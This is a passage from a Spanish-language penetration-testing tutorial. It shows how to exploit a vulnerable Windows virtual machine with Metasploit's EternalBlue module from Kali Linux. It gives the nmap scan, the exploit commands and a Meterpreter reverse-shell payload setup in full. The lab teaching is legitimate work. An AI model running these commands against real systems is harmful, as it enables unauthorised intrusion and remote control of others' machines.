V. Ejecución de una Prueba de Penetración Básica con Metasploit
En esta sección, ejecutaremos una prueba de penetración básica utilizando el exploit EternalBlue en una máquina virtual de Windows como objetivo, y una máquina virtual con Kali Linux como el atacante.
A. Configuración del Entorno de Prueba
Para establecer el entorno de prueba, necesitarás dos máquinas virtuales: una con Kali Linux (donde está instalado Metasploit) y otra con una version de Windows vulnerable. Ambas deben estar en la misma red, es decir, deben poder comunicarse entre sí.
En este caso, puedes configurar ambas máquinas en la misma red NAT en VirtualBox.
B. Escaneo del Objetivo
Antes de lanzar el exploit, necesitarás conocer la dirección IP de la máquina objetivo. Esto se puede hacer utilizando herramientas de escaneo de red como Nmap.
Ejecuta el siguiente comando en Kali Linux para escanear la red y encontrar la dirección IP de la máquina objetivo:
sudo nmap --script vuln <direccion IP>Este comando ejecuta una serie de scripts de Nmap, particularmente los que están diseñados para identificar vulnerabilidades.
C. Selección y Configuración del Exploit
Ahora que conoces la dirección IP del objetivo, puedes seleccionar el exploit EternalBlue e introducir la dirección IP del objetivo:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS [dirección IP del objetivo]D. Selección y Configuración del Payload
A continuación, debes seleccionar y configurar el payload. Para este ejemplo, usaremos un shell inverso de Meterpreter, que permitirá controlar la máquina objetivo si el exploit tiene éxito:
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST [tu dirección IP]
E. Ejecución del Exploit
Una vez que todo está configurado, puedes ejecutar el exploit:
exploit
Si el exploit tiene éxito, tendrás control sobre la máquina objetivo a través de Meterpreter. Recuerda siempre operar dentro de los límites legales y éticos al usar Metasploit.
En la siguiente sección, aprenderemos a utilizar Meterpreter y algunas de sus funciones más útiles.
